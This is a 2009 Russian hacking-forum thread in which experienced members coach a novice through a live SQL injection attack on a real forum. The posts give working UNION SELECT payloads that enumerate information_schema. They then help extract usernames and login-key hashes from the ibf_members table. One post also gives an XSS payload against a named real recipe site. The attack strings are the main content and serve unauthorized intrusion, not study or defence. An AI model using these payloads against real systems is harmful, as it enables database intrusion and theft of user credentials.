Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Сиега, пихаешь в уязвимое поле свой яваскрипт, например "><script>alert()</script> и смотри в адресную строку:
    Code:
    http://www.toidutare.ee//retsept.php?otsi=1&string=&string2=&string3=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&liik=
    Этот линк и кидать, с другими даннымы разумеется...
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:

    union+select+table_name+from+information_schema.tables
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Скорее всего он таблицы называет полями.
     
  4. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    information_schema.tables вот тут смотрю все 115 полей посмотрел ничего нет ставил стандартные название ничего пусто
     
  5. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    +information_schema.tables+limit+14,1--+
     
  6. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    вот так листаю все но ничего нет
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    попробуй например так :

    PHP:
    concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+limit+0,1--+
     
  8. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+limit+14,1--+


    Подскажите как подставить concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1--+

    в мою линк
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    :D :D :D вместо table_name засунь это:

    concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)

    вместо information_schema.tables+limit+14,1 засунь это:

    INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1
     
  10. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    SELECT * FROM ibf_topics WHERE tid = -24435 union select 1,concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 from INFORMATION_SCHEMA.COLUMNS where table_ schema not in (0x696e666f726d6174696f6e5f736368656 d61) limit 0,1 ORDER BY last_post DESC LIMIT 0,1 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 f' at line 1

    вот что пишет :(
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    COLUMN_ NAME

    Убери форумные пробелы. Видишь же, даже в твоей мессаги появляются пробелы, которых не было вообще-то
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    massovka
    Давай линк, или иди почитай статьи. Какой смысл тупо пихать то , что тебе дали, даже не понимая зачем это?

    Ты пробелы не убрал (если тебе это о чём-то говорит)

    2 xcedz я тебя вижу, бойся меня :)
     
    #6392 Kakoytoxaker, 6 Apr 2009
    Last edited: 6 Apr 2009
    2 people like this.
  13. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    я кинул тебе в личку
     
  14. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+limit+14,1--+

    Вот моя сылка просматрюю все поля ничего про user password ничего нет
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Может ты ПМ прочитаешь? Или так и будешь писать сюда?
     
  16. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Вем спасибо jokester помог мне!
     
  17. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Доброе утро всем! Подскажите еще на один вопрос! Какой командой можно вывести все юзеров и хэш! Спасибо

    concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0,100/*

    у меня ща так
     
    #6397 massovka, 7 Apr 2009
    Last edited by a moderator: 7 Apr 2009
  18. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    и шо тебе не нравится? тама же лимит ничо не сделаешь! юзай SIPT он тебе по бистрому все достанет!
     
  19. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    group_concat(name,0x3a3a,member_login_key) без лимита.Вроде первую 1000 знаков (если ошибаюсь-поправьте).
    читай тему, всё расписано.За один запрос всех не выведешь всё равно (если их много), только частями или по опр. параметрам.
    И в limit+0,100/* -сотня не нужна, достаточно единицы
    0,1/*-дальше перебирай 1,1 -2,1 -3,1 -4,1 если просто через concat.
    А вообще действительно-юзай сипт.
     
    #6399 ThreeD, 7 Apr 2009
    Last edited: 7 Apr 2009
  20. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Может я наглый очень! А как можно сделать так чтоб таблице вывелось а не одним рядком!?
     
Thread Status:
Not open for further replies.